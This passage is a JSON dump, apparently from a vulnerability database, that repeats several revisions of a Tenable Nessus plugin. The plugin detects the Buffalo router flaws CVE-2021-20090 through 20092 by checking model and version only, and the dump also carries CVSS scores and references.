"AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152198", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.tenable.com/security/research/tra-2021-13", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20092", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20091"], "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "immutableFields": [], "lastseen": "2021-08-06T13:21:41", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"]}, {"type": "cert", "idList": ["VU:914124"]}], "modified": "2021-08-06T13:21:41", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2021-08-06T13:21:41", "rev": 2}}, "objectVersion": "1.6", "pluginID": "152198", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152198);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/04\");\n\n script_cve_id(\"CVE-2021-20090\", \"CVE-2021-20091\", \"CVE-2021-20092\");\n\n script_name(english:\"Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n \n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could \n allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An \n authenticated remote attacker could leverage this vulnerability to alter device configuration, \n potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to \n sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's \nself-reported version number.\n \");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2021-13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Vendor has released fixes for certain models. Contact vendor for more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-20090\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:buffalo:buffalo\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"buffalo_www_detect.nbin\");\n script_require_keys(\"installed_sw/Buffalo WWW\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:80, embedded:TRUE);\nvar app_info = vcf::get_app_info(app:'Buffalo WWW', webapp:TRUE, port:port);\nvar constraints;\n\nif('WSR-2533DHPL2' >< app_info.model || 'WXR-5700AX7S' >< app_info.model || 'WSR-1166DHP2' >< app_info.model )\n constraints = [{'min_version' : '0', 'fixed_display' : 'No known fix' }];\nelse if('WSR-A2533DHP3' >< app_info.model) \n constraints = [{'min_version' : '0', 'fixed_version' : '1.25' }];\nelse if('WSR-3200AX4S' >< app_info.model)\n constraints = [{'min_version' : '0', 'fixed_version' : '1.20' }];\nelse\n{\n var ver_model = app_info.version;\n if (!empty_or_null(app_info.model))\n ver_model = ver_model + ' (model '+app_info.model+')';\n audit(AUDIT_INST_VER_NOT_VULN, app_info.app, ver_model);\n}\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "naslFamily": "Misc.", "cpe": ["x-cpe:/a:buffalo:buffalo"], "solution": "Vendor has released fixes for certain models. Contact vendor for more information.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-20090", "vpr": {"risk factor": "Medium", "score": "5.9"}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": "2021-04-26T00:00:00", "vulnerabilityPublicationDate": "2021-04-26T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-06T13:21:41", "differentElements": ["vpr"], "edition": 2}, {"bulletin": {"id": "BUFFALO_WSR_CVE_2021_20090.NASL", "hash": "72957f3724724250dfc8381996382f9e", "type": "nessus", "bulletinFamily": "scanner", "title": "Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)", "description": "Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-08-04T00:00:00", "modified": "2021-08-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152198", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.tenable.com/security/research/tra-2021-13", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20092", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20091", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090"], "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "immutableFields": [], "lastseen": "2021-08-07T15:31:26", "history": [], "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20092", "CVE-2021-20091", "CVE-2021-20090"]}, {"type": "cert", "idList": ["VU:914124"]}], "modified": "2021-08-07T15:31:26", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2021-08-07T15:31:26", "rev": 2}}, "objectVersion": "1.6", "pluginID": "152198", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152198);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/04\");\n\n script_cve_id(\"CVE-2021-20090\", \"CVE-2021-20091\", \"CVE-2021-20092\");\n\n script_name(english:\"Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n \n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could \n allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An \n authenticated remote attacker could leverage this vulnerability to alter device configuration, \n potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to \n sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's \nself-reported version number.\n \");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2021-13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Vendor has released fixes for certain models. Contact vendor for more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-20090\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:buffalo:buffalo\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"buffalo_www_detect.nbin\");\n script_require_keys(\"installed_sw/Buffalo WWW\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:80, embedded:TRUE);\nvar app_info = vcf::get_app_info(app:'Buffalo WWW', webapp:TRUE, port:port);\nvar constraints;\n\nif('WSR-2533DHPL2' >< app_info.model || 'WXR-5700AX7S' >< app_info.model || 'WSR-1166DHP2' >< app_info.model )\n constraints = [{'min_version' : '0', 'fixed_display' : 'No known fix' }];\nelse if('WSR-A2533DHP3' >< app_info.model) \n constraints = [{'min_version' : '0', 'fixed_version' : '1.25' }];\nelse if('WSR-3200AX4S' >< app_info.model)\n constraints = [{'min_version' : '0', 'fixed_version' : '1.20' }];\nelse\n{\n var ver_model = app_info.version;\n if (!empty_or_null(app_info.model))\n ver_model = ver_model + ' (model '+app_info.model+')';\n audit(AUDIT_INST_VER_NOT_VULN, app_info.app, ver_model);\n}\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "naslFamily": "Misc.", "cpe": ["x-cpe:/a:buffalo:buffalo"], "solution": "Vendor has released fixes for certain models. Contact vendor for more information.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-20090", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": "2021-04-26T00:00:00", "vulnerabilityPublicationDate": "2021-04-26T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-07T15:31:26", "differentElements": ["vpr"], "edition": 3}, {"bulletin": {"id": "BUFFALO_WSR_CVE_2021_20090.NASL", "hash": "c7199e0507db94fbae3c5621b889e924", "type": "nessus", "bulletinFamily": "scanner", "title": "Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)", "description": "Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-08-04T00:00:00", "modified": "2021-08-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152198", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.tenable.com/security/research/tra-2021-13", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20092", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20091", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090"], "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "immutableFields": [], "lastseen": "2021-08-08T14:07:42", "history": [], "viewCount": 11, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20090", "CVE-2021-20092", "CVE-2021-20091"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}], "modified": "2021-08-08T14:07:42", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-08-08T14:07:42", "rev": 2}}, "objectVersion": "1.6", "pluginID": "152198", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152198);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/04\");\n\n script_cve_id(\"CVE-2021-20090\", \"CVE-2021-20091\", \"CVE-2021-20092\");\n\n script_name(english:\"Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n \n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could \n allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An \n authenticated remote attacker could leverage this vulnerability to alter device configuration, \n potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to \n sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's \nself-reported version number.\n \");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2021-13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Vendor has released fixes for certain models. Contact vendor for more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-20090\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:buffalo:buffalo\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"buffalo_www_detect.nbin\");\n script_require_keys(\"installed_sw/Buffalo WWW\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:80, embedded:TRUE);\nvar app_info = vcf::get_app_info(app:'Buffalo WWW', webapp:TRUE, port:port);\nvar constraints;\n\nif('WSR-2533DHPL2' >< app_info.model || 'WXR-5700AX7S' >< app_info.model || 'WSR-1166DHP2' >< app_info.model )\n constraints = [{'min_version' : '0', 'fixed_display' : 'No known fix' }];\nelse if('WSR-A2533DHP3' >< app_info.model) \n constraints = [{'min_version' : '0', 'fixed_version' : '1.25' }];\nelse if('WSR-3200AX4S' >< app_info.model)\n constraints = [{'min_version' : '0', 'fixed_version' : '1.20' }];\nelse\n{\n var ver_model = app_info.version;\n if (!empty_or_null(app_info.model))\n ver_model = ver_model + ' (model '+app_info.model+')';\n audit(AUDIT_INST_VER_NOT_VULN, app_info.app, ver_model);\n}\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "naslFamily": "Misc.", "cpe": ["x-cpe:/a:buffalo:buffalo"], "solution": "Vendor has released fixes for certain models. Contact vendor for more information.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-20090", "vpr": {"risk factor": "Critical", "score": "9"}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": "2021-04-26T00:00:00", "vulnerabilityPublicationDate": "2021-04-26T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-08T14:07:42", "differentElements": ["exploitEase", "modified", "sourceData", "vpr"], "edition": 4}, {"bulletin": {"id": "BUFFALO_WSR_CVE_2021_20090.NASL", "hash": "e4ba37f77fc2b62f690085e7e59898d1", "type": "nessus", "bulletinFamily": "scanner", "title": "Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)", "description": "Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-08-04T00:00:00", "modified": "2021-08-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152198", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20091", "https://www.tenable.com/security/research/tra-2021-13", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20092", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090"], "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "immutableFields": [], "lastseen": "2021-08-11T13:10:46", "history": [], "viewCount": 11, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"]}, {"type": "seebug", "idList": ["SSV:99329"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}], "modified": "2021-08-11T13:10:46", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-08-11T13:10:46", "rev": 2}}, "objectVersion": "1.6", "pluginID": "152198", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152198);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/10\");\n\n script_cve_id(\"CVE-2021-20090\", \"CVE-2021-20091\", \"CVE-2021-20092\");\n\n script_name(english:\"Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n \n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could \n allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An \n authenticated remote attacker could leverage this vulnerability to alter device configuration, \n potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to \n sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's \nself-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2021-13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Vendor has released fixes for certain models. Contact vendor for more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-20090\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:buffalo:buffalo\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"buffalo_www_detect.nbin\");\n script_require_keys(\"installed_sw/Buffalo WWW\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:80, embedded:TRUE);\nvar app_info = vcf::get_app_info(app:'Buffalo WWW', webapp:TRUE, port:port);\nvar constraints;\n\nif('WSR-2533DHPL2' >< app_info.model || 'WXR-5700AX7S' >< app_info.model || 'WSR-1166DHP2' >< app_info.model )\n constraints = [{'min_version' : '0', 'fixed_display' : 'No known fix' }];\nelse if('WSR-A2533DHP3' >< app_info.model) \n constraints = [{'min_version' : '0', 'fixed_version' : '1.25' }];\nelse if('WSR-3200AX4S' >< app_info.model)\n constraints = [{'min_version' : '0', 'fixed_version' : '1.20' }];\nelse\n{\n var ver_model = app_info.version;\n if (!empty_or_null(app_info.model))\n ver_model = ver_model + ' (model '+app_info.model+')';\n audit(AUDIT_INST_VER_NOT_VULN, app_info.app, ver_model);\n}\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "naslFamily": "Misc.", "cpe": ["x-cpe:/a:buffalo:buffalo"], "solution": "Vendor has released fixes for certain models. Contact vendor for more information.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-20090", "vpr": {"risk factor": "Critical", "score": "9.6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-04-26T00:00:00", "vulnerabilityPublicationDate": "2021-04-26T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-11T13:10:46", "differentElements": ["vpr"], "edition": 5}, {"bulletin": {"id": "BUFFALO_WSR_CVE_2021_20090.NASL", "hash": "c05c01249bf1cd5aee5abfaef9215e67", "type": "nessus", "bulletinFamily": "scanner", "title": "Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)", "description": "Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-08-04T00:00:00", "modified": "2021-08-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152198", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "https://www.tenable.com/security/research/tra-2021-13", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20091", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20092"], "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "immutableFields": [], "lastseen": "2021-08-12T23:33:11", "history": [], "viewCount": 11, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"]}, {"type": "seebug", "idList": ["SSV:99329"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}], "modified": "2021-08-12T23:33:11", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-08-12T23:33:11", "rev": 2}}, "objectVersion": "1.6", "pluginID": "152198", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152198);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/10\");\n\n script_cve_id(\"CVE-2021-20090\", \"CVE-2021-20091\", \"CVE-2021-20092\");\n\n script_name(english:\"Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n \n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could \n allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An \n authenticated remote attacker could leverage this vulnerability to alter device configuration, \n potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to \n sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's \nself-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2021-13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Vendor has released fixes for certain models. Contact vendor for more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-20090\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:buffalo:buffalo\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"buffalo_www_detect.nbin\");\n script_require_keys(\"installed_sw/Buffalo WWW\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:80, embedded:TRUE);\nvar app_info = vcf::get_app_info(app:'Buffalo WWW', webapp:TRUE, port:port);\nvar constraints;\n\nif('WSR-2533DHPL2' >< app_info.model || 'WXR-5700AX7S' >< app_info.model || 'WSR-1166DHP2' >< app_info.model )\n constraints = [{'min_version' : '0', 'fixed_display' : 'No known fix' }];\nelse if('WSR-A2533DHP3' >< app_info.model) \n constraints = [{'min_version' : '0', 'fixed_version' : '1.25' }];\nelse if('WSR-3200AX4S' >< app_info.model)\n constraints = [{'min_version' : '0', 'fixed_version' : '1.20' }];\nelse\n{\n var 